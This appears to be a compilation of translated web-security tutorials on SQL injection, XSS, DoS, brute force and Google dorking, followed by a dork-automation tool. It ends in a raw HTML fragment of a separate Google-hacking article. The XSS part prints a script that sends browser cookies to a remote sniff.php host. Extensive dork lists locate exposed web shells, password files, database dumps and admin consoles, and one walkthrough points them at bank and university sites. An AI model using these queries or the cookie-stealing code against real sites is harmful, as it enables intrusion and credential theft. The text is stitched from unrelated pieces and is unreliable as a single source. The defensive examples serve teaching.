
I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started front-end development. What is the problem?

Many novice developers are so absorbed in writing code that they completely forget about the security of their work. Most importantly, they forget about vulnerabilities such as SQL injection and XSS. They also choose easy passwords for their administrative panels and fall victim to brute force. What are these attacks and how can they be avoided?

SQL injection

SQL injection is the most common type of attack on a database; it is carried out through an SQL query crafted for the specific DBMS. Many people and even large companies suffer from such attacks. The cause is a developer's mistake in designing the database and, above all, in writing the SQL queries.

An SQL injection attack is possible because input data used in SQL queries is processed incorrectly. If the attack succeeds, you risk losing not only the contents of the database but also the logins and passwords of the administrative panel. That data is quite enough to take over the site completely or to make irreversible changes to it.

The attack can be reproduced in scripts written in PHP, ASP, Perl and other languages. Whether it succeeds depends more on which DBMS is used and how the script itself is implemented. There are many sites in the world vulnerable to SQL injection, and this is easy to verify: it is enough to enter "dorks", special search queries for finding vulnerable sites. Here are some of them:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

How are they used? It is enough to enter them into the Google or Yandex search engine. The search engine returns not just a vulnerable site but the very page with the vulnerability. We will not stop there, though, and will make sure the page really is vulnerable. For this, it is enough to append a single quote (') to the value id=1, like this:

  • inurl:games.php?id=1'

The site will then return an SQL query error. What does our hacker need next?

He needs just this link to the page with the error. Further work on the vulnerability usually takes place in the Kali Linux distribution, whose utilities handle this part: injecting the code and performing the required operations. How exactly that happens I will not tell you, but information about it can be found on the Internet.
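The mistake described above, shown side by side with the fix, as an added example that is not part of the original article. The same lookup is written twice against an in-memory SQLite table constructed here as sample data: once with the request value pasted into the query text (the developer error the text describes), once with the value passed as a bound parameter. The single-quote probe from the text (id=1') breaks the first and is harmless to the second.

```python
"""Added example (not from the article): the same article lookup written
two ways, run against constructed sample data in an in-memory SQLite table."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a tiny 'articles' table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO articles (id, title) VALUES (?, ?)",
        [(1, "First post"), (2, "Second post")],
    )
    return conn


def find_article_concat(conn: sqlite3.Connection, raw_id: str):
    """VULNERABLE: the request parameter is pasted straight into the SQL text,
    so any quote or operator in it becomes part of the statement."""
    sql = "SELECT id, title FROM articles WHERE id = '" + raw_id + "'"
    return conn.execute(sql).fetchall()


def find_article_param(conn: sqlite3.Connection, raw_id: str):
    """SAFE: the value travels as a bound parameter; the DBMS never parses it
    as SQL, so a quote inside it is just a character in the comparison."""
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def probe(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Report what each variant does with a given id value:
    ('error', message) when the DBMS rejects the statement, else ('rows', rows).
    The error case is exactly what the text's single-quote check looks for."""
    out = {}
    for name, fn in (("concat", find_article_concat), ("param", find_article_param)):
        try:
            out[name] = ("rows", fn(conn, raw_id))
        except sqlite3.Error as exc:
            out[name] = ("error", str(exc))
    return out


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), probe(db, value))
```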

XSS Attack

This type of attack targets cookies. Users, in turn, are very fond of them, and why not? Thanks to cookies we do not retype our password for Vk.com or Mail.ru a hundred times, and few people refuse them. But on the Internet there is a rule that hackers count on: the coefficient of convenience is directly proportional to the coefficient of insecurity.

To carry out an XSS attack, our hacker needs to know JavaScript. At first glance the language is very simple and harmless, because it has no access to the computer's resources: a hacker can work with JavaScript only inside the browser. But that is enough, because the main thing is to get the code into the web page.

I will not go into detail about the attack process, only the basics and the idea of how it happens.

A hacker can add JS code to some forum or guestbook:

The script redirects us to an infected page where code will be executed: a sniffer, some kind of storage, or an exploit that somehow steals our cookies from the cache.

Why JavaScript? Because JavaScript works well with web requests and has access to cookies. But if our script sends the user to some site, the user will easily notice it. So the hacker uses a more cunning option: he simply hides the code in an image.

    // create an image whose "address" is the attacker's script with the cookie appended;
    // the browser requests that URL and thereby sends document.cookie to the remote host
    var img = new Image();
    img.src = "http://192.168.1.7/sniff.php?" + document.cookie;

We simply create an image and assign the address of our script, with the cookie appended, as its source; loading the image sends the request.

How to protect yourself from all this? Very simple - do not follow suspicious links.
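The advice above addresses the user; on the developer side, the two controls that defeat this particular script are escaping user text before it is placed in a page and marking the session cookie HttpOnly so document.cookie cannot read it. The following is an added example, not part of the original article; the guestbook entries, the injected payload and the cookie value are constructed sample data.

```python
"""Added example (not from the article): a guestbook that escapes what users
post, and a session cookie the page's script cannot read."""
import html
from http.cookies import SimpleCookie

PAGE_TEMPLATE = "<html><body><h1>Guestbook</h1>\n{entries}\n</body></html>"

# constructed payload in the shape the article describes: a script tag that
# builds an image whose URL carries document.cookie
SAMPLE_PAYLOAD = ('<script>new Image().src="http://192.168.1.7/sniff.php?"'
                  '+document.cookie</script>')


def render_entry_unsafe(author: str, text: str) -> str:
    """VULNERABLE: user text is concatenated into the HTML as-is, so a posted
    <script> tag becomes part of the page and runs in every visitor's browser."""
    return "<p><b>" + author + "</b>: " + text + "</p>"


def render_entry(author: str, text: str) -> str:
    """SAFE: every user-controlled string is escaped before it is placed in
    HTML; html.escape turns <, >, &, ' and " into entity references, so the
    payload is displayed as text instead of being executed."""
    return "<p><b>{}</b>: {}</p>".format(html.escape(author, quote=True),
                                       html.escape(text, quote=True))


def render_page(entries) -> str:
    """Build the page from (author, text) pairs; no entry can inject markup."""
    body = "\n".join(render_entry(a, t) for a, t in entries)
    return PAGE_TEMPLATE.format(entries=body)


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for the session. HttpOnly keeps the value out of
    document.cookie (so the injected script above has nothing to send),
    Secure keeps it off plain http, SameSite=Lax limits cross-site sending."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_entry_unsafe("guest", SAMPLE_PAYLOAD))   # script survives
    print(render_page([("guest", SAMPLE_PAYLOAD)]))        # script neutralised
    print(session_cookie_header("abc123"))
```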

DoS and DDoS Attacks

DoS (from the English Denial of Service) is a hacker attack on a computer system with the aim of bringing it to failure: creating conditions under which legitimate users of the system cannot access the resources it provides (servers), or access becomes difficult. The failure of a system can also be a step towards taking it over, if in an emergency the software gives out critical information: for example, the version, part of the program code, etc. But most often it is a means of economic pressure: downtime of a service that generates income, bills from the provider and measures to avert the attack hit the "target" hard in the pocket. Currently DoS and DDoS attacks are the most popular, since they allow almost any system to be brought to failure without leaving legally significant evidence.

What is the difference between DoS and DDoS attacks?

DoS is an attack built cleverly. For example, if the server does not check the correctness of incoming packets, a hacker can craft a request that will be processed forever, so there is not enough processor time to handle other connections. Accordingly, clients receive a denial of service. But it will not work to overload or disable large well-known sites this way: they have wide enough channels and powerful servers that easily cope with such a load.

DDoS is essentially the same attack as DoS. But where DoS uses one request packet, DDoS may well use hundreds or more, and even heavy-duty servers may not cope with such a load. Let me give an example.

A DoS attack is when you are having a conversation with someone and some ill-mannered person comes up and starts screaming loudly. Talking becomes impossible or very difficult. The solution: call security, who will calm the person down and take him out of the room. A DDoS attack is when thousands of such ill-mannered people run in; in this case the guards cannot restrain and remove everyone.

DoS and DDoS attacks are launched from so-called zombie computers: machines of users who have been hacked and do not even suspect that their computer is taking part in an attack on some server.

How to protect yourself from this? In general, there is no way. But you can make the hacker's task harder: for that, choose a good hosting provider with powerful servers.

Brute force attack

A developer can devise many systems of protection against attacks, thoroughly review the scripts he has written, check the site for vulnerabilities, and so on. But at the last step of setting up the site, when all that is left is to put a password on the admin panel, he can forget about one thing. The password!

It is strongly not recommended to set a simple password such as 12345, 1114457, vasya111, etc. It is also not recommended to set passwords shorter than 10-11 characters. Otherwise you may be subjected to the most common and least complicated attack: brute force.

Brute force is a password-guessing attack driven by a dictionary and carried out with special programs. The dictionaries vary: Latin letters, numbers enumerated up to some range, mixed (Latin letters + numbers), and there are even dictionaries with special symbols such as @#4$%&*~~`'"\ ? and so on.

Of course, this type of attack is easy to avoid: it is enough to come up with a complex password. Even a captcha can save you. Also, if your site is built on a CMS, many of them detect this type of attack and block the IP. Always remember that the more different characters there are in the password, the harder it is to guess.

How do hackers work? In most cases they either suspect or already know part of the password. It is logical to assume that a user's password will certainly not consist of 3 or 5 characters; such passwords lead to frequent break-ins. Typically hackers take a range of 5 to 10 characters and add a few characters they probably know in advance, then generate passwords within the desired ranges. The Kali Linux distribution even has programs for such cases. And voila, the attack no longer takes long, since the dictionary is no longer so large. In addition, a hacker can use the power of the video card: some of them support CUDA, and the enumeration speed increases by as much as 10 times. So we see that an attack in such a simple way is quite real. And not only sites are subjected to brute force.
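The IP blocking that the text credits CMSs with, as an added example in Python that is not the code of any particular CMS: failed logins are counted per source address in a sliding window, and once the count reaches the threshold every further attempt from that address is refused, a correct password included, until the window has passed. The log lines are constructed sample input.

```python
"""Added example (not from the article): per-IP login lockout replayed over
constructed login records of the form 'unix_timestamp source_ip user OK|FAIL'."""
import re
from collections import defaultdict, deque

LINE_RE = re.compile(r"^(?P<ts>\d+) (?P<ip>[\d.]+) (?P<user>\S+) (?P<result>OK|FAIL)$")

# constructed sample log: one address hammers the admin account, another
# user mistypes once and then logs in normally
SAMPLE_LOG = [
    "1000 203.0.113.5 admin FAIL",
    "1001 203.0.113.5 admin FAIL",
    "1002 198.51.100.7 editor FAIL",
    "1002 203.0.113.5 admin FAIL",
    "1003 198.51.100.7 editor OK",
    "1003 203.0.113.5 admin FAIL",
    "1004 203.0.113.5 admin FAIL",   # fifth failure: threshold reached
    "1005 203.0.113.5 admin FAIL",   # refused before the password is checked
    "1006 203.0.113.5 admin OK",     # refused too: lockout ignores the password
    "1700 203.0.113.5 admin FAIL",   # window (600 s) has passed, counting restarts
]


class LoginThrottle:
    """Keeps the timestamps of recent failures per source IP."""

    def __init__(self, max_failures: int = 5, window_seconds: int = 600):
        self.max_failures = max_failures
        self.window = window_seconds
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures

    def _prune(self, ip: str, now: int) -> None:
        q = self.failures[ip]
        while q and now - q[0] >= self.window:
            q.popleft()

    def is_blocked(self, ip: str, now: int) -> bool:
        """True once the address has max_failures failures inside the window."""
        self._prune(ip, now)
        return len(self.failures[ip]) >= self.max_failures

    def record(self, ip: str, now: int, success: bool) -> None:
        if success:
            self.failures.pop(ip, None)  # a genuine login clears the counter
        else:
            self._prune(ip, now)
            self.failures[ip].append(now)


def replay(log_lines, max_failures: int = 5, window_seconds: int = 600):
    """Feed records through the throttle in order; return (ts, ip, decision)
    per record, where decision is 'ok', 'fail' or 'blocked' (attempt refused
    without the password being checked at all)."""
    throttle = LoginThrottle(max_failures, window_seconds)
    decisions = []
    for line in log_lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess
        ts, ip, ok = int(m["ts"]), m["ip"], m["result"] == "OK"
        if throttle.is_blocked(ip, ts):
            decisions.append((ts, ip, "blocked"))
            continue
        throttle.record(ip, ts, ok)
        decisions.append((ts, ip, "ok" if ok else "fail"))
    return decisions


def blocked_ips(decisions) -> set:
    """Addresses that were refused at least once: what a CMS would ban or alert on."""
    return {ip for _, ip, d in decisions if d == "blocked"}


if __name__ == "__main__":
    for row in replay(SAMPLE_LOG):
        print(row)
    print("blocked:", blocked_ips(replay(SAMPLE_LOG)))
```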

Dear developers, never forget about information security, because today many people, including states, suffer from such attacks. After all, the biggest vulnerability is a person, who can always be distracted or overlook something. We are programmers, not programmed machines. Always be on the alert, because the loss of information threatens serious consequences!

Any search for vulnerabilities in web resources begins with reconnaissance and information gathering.
Reconnaissance can be active (brute-forcing the site's files and directories, running vulnerability scanners, browsing the site manually) or passive (searching for information in various search engines). Sometimes a vulnerability becomes known even before the first page of the site is opened.

How is this possible?
Search robots, constantly crawling the Internet, record, in addition to information useful to an ordinary user, much that can be used by attackers against a web resource: for example, script errors and files with sensitive information (from configuration files and logs to files with authentication data and database backups).
From the point of view of a search robot, an SQL query error message is plain text, indistinguishable from, say, a product description on the page. If a search robot stumbles upon a file with the .sql extension that for some reason ended up in the site's working folder, it is treated as part of the site's content and is indexed as well (including, possibly, the passwords specified in it).

Such information can be found by knowing strong, often unique, keywords that help separate "vulnerable pages" from pages that contain no vulnerabilities.
A huge database of such special queries using keywords (so-called dorks) exists at exploit-db.com and is known as the Google Hack Database.

Why Google?
Dorks are targeted primarily at Google for two reasons:
  • the most flexible syntax for keywords (given in Table 1) and special characters (given in Table 2);
  • the Google index is still more complete than that of other search engines.

Table 1 - Key Google keywords

  • site - search only on the specified site; considers only the URL. Example: site:somesite.ru - finds all pages on the given domain and its subdomains
  • inurl - search by words present in the URI; unlike "site", it matches after the site name. Example: inurl:news - finds all pages whose URI contains the given word
  • intext - search in the body of the page. Example: intext:"traffic" - the same as the ordinary query "traffic"
  • intitle - search in the page title (the text between the <title> tags). Example: intitle:"index of" - finds all pages with a directory listing
  • ext - search for pages with the specified extension. Example: ext:pdf - finds all PDF files
  • filetype - at present completely equivalent to "ext". Example: filetype:pdf - the same
  • related - search for sites with similar topics. Example: related:google.ru - shows its analogues
  • link - search for sites that link to the given one. Example: link:somesite.ru - finds all sites that link to it
  • define - show a word's definition. Example: define:0day - definition of the term
  • cache - show the cached copy of the page (if available). Example: cache:google.com - open the page from the cache

Table 2 - Google query special characters

  • " (double quotes) - exact phrase. Example: intitle:"RouterOS router configuration page" - search for routers
  • * - any text. Example: inurl:"bitrix*mcart" - search for sites on Bitrix with a vulnerable mcart module
  • . - any character. Example: Index.of - similar to the "index of" query
  • - - exclude a word. Example: error -warning - show all pages with "error" but without "warning"
  • .. - range. Example: cve 2006..2016 - show vulnerabilities by year starting from 2006
  • | - logical "or". Example: linux | windows - show pages where either the first or the second word occurs

It should be understood that any request to a search engine is a search by words only. It is useless to look for meta-characters on a page (quotes, brackets, punctuation marks, etc.). Even a search for an exact phrase in quotation marks is a word search, followed by exact matching within the results.

All Google Hack Database dorks are logically divided into 14 categories, presented in Table 3.

Table 3 - Google Hack Database categories

  • Footholds - web shells, public file managers. Example: find all hacked sites containing the listed web shells: (intitle:"phpshell" OR intitle:"c99shell" OR intitle:"r57shell" OR intitle:"PHP Shell" OR intitle:"phpRemoteView") `rwx` "uname"
  • Files containing usernames - registry files, configuration files, logs, files containing the history of entered commands. Example: find all registry files containing account information: filetype:reg reg +intext:"internet account manager"
  • Sensitive Directories - directories with various information (personal documents, VPN configs, hidden repositories, etc.). Examples: find all directory listings containing files related to VPN: "Config" intitle:"Index of" intext:vpn ; sites containing git repositories: (intext:"index of /.git") ("parent directory")
  • Web Server Detection - version and other information about the web server. Example: find the administrative consoles of the JBoss server: inurl:"/web-console/" intitle:"Administration Console"
  • Vulnerable Files - scripts containing known vulnerabilities. Example: find sites that use a script that allows downloading an arbitrary file from the server: allinurl:forcedownload.php?file=
  • Vulnerable Servers - installation scripts, web shells, open administrative consoles, etc. Example: find open phpMyAdmin consoles running as root: intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
  • Error Messages - various errors and warnings that often reveal important information, from the CMS version to passwords. Example: sites with errors in executing SQL queries to the database: "Warning: mysql_query()" "invalid query"
  • Files containing juicy info - certificates, backups, emails, logs, SQL scripts, etc. Example: find initialization SQL scripts: filetype:sql and "insert into" -site:github.com
  • Files containing passwords - everything that can contain passwords: logs, SQL scripts, etc. Examples: logs mentioning passwords: filetype:log intext:password | pass | pw ; SQL scripts containing passwords: ext:sql intext:username intext:password
  • Sensitive Online Shopping Info - information related to online shopping. Example: find PIN codes: dcid= bn= pin code=
  • Network or vulnerability data - information not directly related to the web resource but affecting the network or other non-web services. Example: find automatic proxy configuration scripts containing information about the internal network: inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
  • Pages containing portals - pages containing login forms. Example: SAP logon web pages: intext:"2016 SAP AG. All rights reserved." intitle:"login"
  • Various Online Devices - printers, routers, monitoring systems, etc. Example: find the printer configuration panel: intitle:"hp laserjet" inurl:SSI/Auth/set_config_deviceinfo.htm
  • Advisories and Vulnerabilities - sites running vulnerable versions of a CMS. Example: find vulnerable plugins through which an arbitrary file can be uploaded to the server: inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled

Dorks are more often aimed at searching all sites on the Internet. But nothing prevents you from limiting the search to a particular site or sites: each request to Google can be focused on a specific site by adding the keyword "site:somesite.com" to it. This keyword can be appended to any dork.

Vulnerability Search Automation

So the idea was born to write a simple utility that automates the search for vulnerabilities using a search engine (Google) and based on the Google Hack Database.

The utility is a script written in nodejs using phantomjs; to be precise, the script is interpreted by phantomjs itself. Phantomjs is a full-fledged web browser without a graphical interface, driven by JS code and with a convenient API. The utility received the quite understandable name dorks. Running it on the command line without options prints a short help with several usage examples:

Figure 1 - List of basic dorks options

The general syntax of the utility is: dorks "command" "list of options". A detailed description of all options is given in Table 4.

Table 4 - dorks syntax

Command ghdb:
  • -l - display a numbered list of the Google Hack Database dork categories
  • -c "category number or name" - download the dorks of the specified category, by number or name
  • -q "phrase" - download the dorks found for the given query
  • -o "file" - save the result to a file (only with the -c or -q options)

Command google:
  • -d "dork" - specify an arbitrary dork (may be used many times; may be combined with -D)
  • -D "file" - use dorks from a file
  • -s "site" - set the site (may be used many times; may be combined with -S)
  • -S "file" - use sites from a file (the dorks are searched for each site independently)
  • -f "filter" - set additional keywords (added to each dork)
  • -t "number of ms" - interval between requests to Google
  • -T "number of ms" - timeout if a captcha is encountered
  • -o "file" - save the result to a file (only the dorks for which something was found are saved)

Using the ghdb command, you can get all the dorks from exploit-db for an arbitrary query, or an entire category. If you specify category 0, the entire database is downloaded (about 4.5 thousand dorks).

The list of categories currently available is shown in Figure 2.

Figure 2 - List of available categories of GHDB dorks

The google command substitutes each dork into the Google search engine and analyses the result for matches. Dorks for which something was found are saved to a file. The utility supports different search modes:
  • 1 dork and 1 site;
  • 1 dork and many sites;
  • 1 site and many dorks;
  • many sites and many dorks.
The list of dorks and sites can be specified either as an argument or through a file.

Demonstration of work

Let's try to look for vulnerabilities using error messages as an example. The command dorks ghdb -c 7 -o errors.dorks loads all known dorks of the "Error Messages" category, as shown in Figure 3.

Figure 3 - Loading all known dorks of the "Error Messages" category

The dorks are loaded and saved to a file. Now it remains to "set" them on some site (see Figure 4).
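How the google command is described as combining its inputs, as an added example in Python that is not the dorks utility's own code: each dork is paired with each target site, the -f filter words are appended, a site: clause scopes the query the way the text says any dork can be limited to one site, and queries over the 32-word limit mentioned later are held back rather than sent. parse_operators splits a dork into the Table 1 operators. The tokenization and the word count are assumptions about how Google counts; nothing is sent anywhere, so the functions only show what would be asked, for instance about your own domain.

```python
"""Added example (not the dorks utility's code): compose and check the queries
the google command would issue, and break a dork into its operators."""
import itertools
import re
from typing import Iterable, List, Optional, Tuple

# A token is a run of non-space text in which quoted phrases stay whole, so
# intitle:"index of" is one token (assumption about Google's tokenization).
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
OPERATOR_RE = re.compile(r'^(?P<neg>-?)(?P<op>[a-z]+):(?P<arg>.+)$')
MAX_WORDS = 32  # limit stated in the article


def tokenize(query: str) -> List[str]:
    return TOKEN_RE.findall(query)


def word_count(query: str) -> int:
    """Words as counted for the 32-word limit (assumption): quotes are removed
    and every whitespace-separated term counts, operator:term being one term."""
    return sum(len(tok.replace('"', '').split()) for tok in tokenize(query))


def parse_operators(query: str) -> List[Tuple[str, str, bool]]:
    """(operator, argument, negated) for each operator:term token; for example
    -site:github.com gives ('site', 'github.com', True). Plain words are skipped."""
    found = []
    for tok in tokenize(query):
        m = OPERATOR_RE.match(tok.strip("()"))
        if m:
            found.append((m["op"], m["arg"].strip('"'), m["neg"] == "-"))
    return found


def compose(dork: str, site: Optional[str] = None, filters: Iterable[str] = ()) -> str:
    """The -f filter words are appended to the dork, then a site: clause (-s)
    scopes it to one site; with no site the dork runs Internet-wide."""
    parts = [dork.strip(), *filters]
    if site:
        parts.append("site:" + site)
    return " ".join(p for p in parts if p)


def build_queries(dorks: Iterable[str], sites: Iterable[str] = (),
                  filters: Iterable[str] = ()) -> Tuple[List[str], List[str]]:
    """Every dork x site combination (the four modes the text lists collapse to
    this product). Returns (accepted, rejected): rejected queries exceed
    MAX_WORDS and need shortening instead of being sent and refused."""
    filters = list(filters)
    accepted, rejected = [], []
    for dork, site in itertools.product(list(dorks), list(sites) or [None]):
        q = compose(dork, site, filters)
        (accepted if word_count(q) <= MAX_WORDS else rejected).append(q)
    return accepted, rejected


if __name__ == "__main__":
    # constructed inputs: two dorks from Table 3, one site, the -f bank filter
    ok, bad = build_queries(['"Warning: mysql_query()" "invalid query"',
                             'intitle:"Index of" intext:vpn'],
                            ["example.com"], ["bank"])
    for q in ok:
        print(word_count(q), "words:", q, parse_operators(q))
    print("rejected:", bad)
```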
Figure 4 - Searching for vulnerabilities of the site of interest in the Google cache

After some time, several pages containing errors are found on the site under study (see Figure 5).

Figure 5 - Found error messages

As a result, in the result.txt file we get the complete list of dorks that lead to an error. Figure 6 shows the result of the search for site errors.

Figure 6 - The result of the search for errors

In the cache for this dork a full backtrace is displayed, revealing the absolute paths of the scripts, the site's content management system and the type of database (see Figure 7).

Figure 7 - Disclosure of information about the site structure

However, it should be borne in mind that not all dorks from the GHDB give a true result; also, Google may not find an exact match and show a similar result instead.

In this case it is wiser to use your own list of dorks. For example, it is always worth looking for files with "unusual" extensions, examples of which are shown in Figure 8.

Figure 8 - List of file extensions that are not typical for a regular web resource

As a result, with the command dorks google -D extensions.txt -f bank, from the very first request Google starts returning sites with "unusual" file extensions (see Figure 9).

Figure 9 - Search for "bad" file types on banking sites

Keep in mind that Google does not accept queries longer than 32 words.

With dorks google -d intext:"error|warning|notice|syntax" -f university you can look for PHP interpreter errors on educational sites (see Figure 10).

Figure 10 - Finding PHP runtime errors

Sometimes it is inconvenient to use one or two categories of dorks. For example, if you know the site runs on the WordPress engine, you need dorks specifically for WordPress. In this case it is convenient to use the Google Hack Database search: dorks ghdb -q wordpress -o wordpress_dorks.txt downloads all WordPress dorks, as shown in Figure 11.

Figure 11 - Search for dorks related to WordPress

Let's go back to banks again: with the command dorks google -D wordpress_dorks.txt -f bank we will try to find something interesting related to WordPress (see Figure 12).

Figure 12 - Searching for WordPress vulnerabilities

It is worth noting that the Google Hack Database search does not accept words shorter than 4 characters. For example, suppose the site's CMS is not known but the language is: PHP. In this case you can filter what you need manually, using a pipe and the system's search utility: dorks ghdb -c all | findstr /I php > php_dorks.txt (see Figure 13).

Figure 13 - Search through all dorks that mention PHP

Searching for vulnerabilities or sensitive information through a search engine only makes sense if the site has a significant index. For example, if a site has 10-15 pages indexed, it is pointless to search for anything this way. Checking the index size is easy: just enter "site:somesite.com" into the Google search bar. An example of a site with an insufficient index is shown in Figure 14.

Figure 14 - Checking the site index size

Now about the unpleasant part. From time to time Google may request a captcha; there is nothing to be done, it has to be entered. For example, when going through the "Error Messages" category (90 dorks), the captcha came up only once.

It is worth adding that phantomjs also supports working through a proxy, both HTTP and SOCKS. To enable proxy mode, uncomment the corresponding line in dorks.bat or dorks.sh.

The tool is available as source code.

The Google search engine (www.google.com) provides many search options. All of these features are an invaluable search tool for a first-time Internet user and at the same time an even more powerful weapon of invasion and destruction in the hands of people with evil intentions, including not only hackers but also non-computer criminals and even terrorists.

Denis Batrankov
denisNOSPAMixi.ru

Attention: This article is not a guide to action.
This article is written for you, WEB server administrators, so that you will lose the false feeling that you are safe, and you will finally understand the insidiousness of this method of obtaining information and set about protecting your site.</i></p> <h2>Introduction</h2> <p>For example, I found 1670 pages in 0.14 seconds!</p> <p><b>2. </b> Let's enter another line, for example:</p> <b> <a target="_blank" href="http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=inurl:%22auth_user_file.txt%22">inurl:"auth_user_file.txt"</a> </b> <p>a little less, but this is already enough for free download and for guessing passwords (using the same John The Ripper). Below I will give some more examples.</p> <p>So, you need to realize that the Google search engine has visited most of the Internet sites and cached the information contained on them. This cached information allows you to get information about the site and the content of the site without a direct connection to the site, just digging into the information that is stored internally by Google. Moreover, if the information on the site is no longer available, then the information in the cache may still be preserved. All it takes for this method is to know some Google keywords. This technique is called Google Hacking.</p> <p>For the first time, information about Google Hacking appeared on the Bugtruck mailing list 3 years ago. In 2001, this topic was raised by a French student. Here is a link to this letter http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html . It gives the first examples of such requests:</p> <p><b>1) Index of /admin <br>2) Index of /password <br>3) Index of /mail <br>4) Index of / +banques +filetype:xls (for france...) <br>5) Index of / +passwd <br>6) Index of/password.txt</b></p> <p>This topic made a lot of noise in the English-reading part of the Internet quite recently: after an article by Johnny Long published on May 7, 2004. 
For a fuller study of Google Hacking, I advise you to visit the author's site, http://johnny.ihackstuff.com. In this article I just want to bring you up to date.</p> <p>Who can use it: <br>- Journalists, spies and everyone who likes to stick their nose into other people's business, to dig up compromising material. <br>- Hackers looking for suitable targets.</p> <h2>How Google works.</h2> <p>To continue the conversation, let me remind you of some of the keywords used in Google queries.</p> <p><b>Search using the + sign</b></p> <p>Google drops from the search words it considers unimportant: in English, for example, question words, prepositions and articles such as are, of, where. In Russian, Google seems to treat every word as important. When a word is excluded from the search, Google says so. To make Google search for pages containing such words, put a + sign directly before each of them, with no space between the sign and the word. For example:</p> <p><b>ace +of base</b></p> <p>(Google has since retired the + operator; putting the word in double quotes now has the same effect.)</p> <p><b>Search using the - sign</b></p> <p>If Google returns a large number of pages and you want to exclude those on certain topics, you can make it return only pages that do not contain certain words. To do so, put a - sign directly before each such word, again with no space before the word. For example:</p> <p><b>fishing -vodka</b></p> <p><b>Search with the ~ sign</b></p> <p>You may want to find not only the specified word but also its synonyms. To do so, put the ~ symbol before the word. (This operator has also since been retired.)</p> <p><b>Finding an exact phrase using double quotes</b></p> <p>Google looks on each page for all the words you typed in the query string and does not care about their relative position; all that matters is that all the specified words appear on the page together (this is the default behaviour).
To find an exact phrase, enclose it in quotation marks. For example:</p> <p><b>"bookend"</b></p> <p>To require at least one of the specified words, state the logical operation explicitly with OR. For example:</p> <p><b>book safety OR protection</b></p> <p>In addition, you can use the * sign in the search string to stand for any word, and . to stand for any character.</p> <p><b>Finding words with additional operators</b></p> <p>There are search operators that are written in the search string in the format:</p> <p><b>operator:search_term</b></p> <p>No spaces are needed around the colon. If you put a space after the colon, you get an error message; if you put one before it, Google treats the two parts as an ordinary search string. <br>The additional search operators fall into groups: language restricts results to a given language; date limits results to the past three, six or twelve months; occurrences say where in the document the string must appear: anywhere, in the title or in the URL; domains restrict the search to a given site or, conversely, exclude it; safe search blocks sites containing a given kind of content and removes them from the result pages. <br>Some operators need no additional parameter: for example, " <b>cache:www.google.com</b>" can be used as the whole query, whereas others require a search term as well, for example " <b>site:www.google.com help</b>".
In the light of our topic, let's look at the following operators:</p> <table border="1" cellpadding="0" cellspacing="0"><tr><td valign="top"><p><b>Operator</b></p> </td> <td valign="top"><p><b>Description</b></p> </td> <td valign="top"><p><b>Requires an additional parameter?</b></p> </td> </tr><tr><td valign="top"><p><b>site:</b></p> </td> <td valign="top"><p>search only the site specified in search_term</p> </td> <td valign="top"><p>yes</p> </td> </tr><tr><td valign="top"><p><b>filetype:</b></p> </td> <td valign="top"><p>search only in documents of type search_term</p> </td> <td valign="top"><p>yes</p> </td> </tr><tr><td valign="top"><p><b>link:</b></p> </td> <td valign="top"><p>show all pages that link to search_term</p> </td> <td valign="top"><p>no</p> </td> </tr><tr><td valign="top"><p><b>cache:</b></p> </td> <td valign="top"><p>show Google's cached copy of the page search_term</p> </td> <td valign="top"><p>no</p> </td> </tr><tr><td valign="top"><p><b>intitle:</b></p> </td> <td valign="top"><p>find pages containing search_term in the title</p> </td> <td valign="top"><p>no</p> </td> </tr><tr><td valign="top"><p><b>allintitle:</b></p> </td> <td valign="top"><p>find pages containing all the words of search_term in the title</p> </td> <td valign="top"><p>no</p> </td> </tr><tr><td valign="top"><p><b>inurl:</b></p> </td> <td valign="top"><p>find pages containing the word search_term in their address</p> </td> <td valign="top"><p>no</p> </td> </tr><tr><td valign="top"><p><b>allinurl:</b></p> </td> <td valign="top"><p>find pages containing all the words of search_term in their address</p> </td> <td valign="top"><p>no</p> </td> </tr></table><p>The <b>site:</b> operator limits the search to the specified site; you can give not only a domain name but also an IP address. For example, enter:</p> <p>The <b>filetype:</b> operator restricts the search to files of a certain type.
